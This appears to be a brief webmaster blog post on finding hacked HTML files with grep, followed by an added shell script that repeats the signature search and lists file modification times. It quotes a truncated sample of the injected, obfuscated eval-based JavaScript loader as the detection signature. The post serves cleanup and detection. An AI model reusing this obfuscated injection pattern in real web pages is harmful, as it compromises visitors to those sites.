Find hacked files with grep

Using grep to find hacked files on a website should be quick and easy, and it gives you a list of every file that contains the injected code.

I ran across a server that had JavaScript injected in a bunch of their HTML pages. I was able to find a part of the JavaScript unique to the compromised code:

 <!--0c0896--><script type="text/javascript" language="javascript">
bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["\x62o"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6a,68,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c................................4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1327!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script><!--/0c0896-->

Running the following command, I was able to get a list of all files containing the string "ff=String.fromCharCode;w=window;z=":

# grep -Rl "ff=String.fromCharCode;w=window;z=" /var/www/vhosts/exampledomain.com/httpdocs/
/var/www/vhosts/exampledomain.com/httpdocs/index.html
/var/www/vhosts/exampledomain.com/httpdocs/info.html
/var/www/vhosts/exampledomain.com/httpdocs/folder1/index.html
/var/www/vhosts/exampledomain.com/httpdocs/folder1/contactus.html
....
...
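
The same search as a reusable script, added here as an example and not part of the original post. It matches the signature as a fixed string, limits the scan to web content files, and lists modification times to help date the injection. `find_injected` and `report_injected` are hypothetical helper names, and `date -r FILE` assumes GNU coreutils.

```shell
#!/bin/sh
# Added example: locate files carrying the injected-script signature.
# SIGNATURE is the unique fragment quoted in the post.
SIGNATURE='ff=String.fromCharCode;w=window;z='

# find_injected DIR
# Prints one matching file path per line, sorted.
#   -R  recurse into DIR
#   -l  print file names only, not the matching lines
#   -I  skip binary files (images, archives)
#   -F  fixed-string match: without it the "." in the signature is a
#       regex wildcard and the pattern matches more than intended
#   --include  restrict the scan to file types that can carry the script
#   --  ends option parsing, so a DIR starting with "-" is not read as a flag
find_injected() {
    grep -RlIF \
        --include='*.html' --include='*.htm' \
        --include='*.php' --include='*.js' \
        -e "$SIGNATURE" -- "$1" | sort
}

# report_injected DIR
# Same list, each path prefixed with its modification time, oldest first.
# The earliest timestamps help bound when the injection took place
# (mtime can be altered, so treat it as a hint and confirm against logs).
# Paths containing newlines are not handled by this line-based loop.
report_injected() {
    find_injected "$1" | while IFS= read -r f; do
        printf '%s\t%s\n' "$(date -r "$f" '+%Y-%m-%d %H:%M:%S')" "$f"
    done | sort
}

# Usage: sh find_injected.sh /var/www/vhosts/exampledomain.com/httpdocs/
if [ "$#" -eq 1 ]; then
    report_injected "$1"
fi
```
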
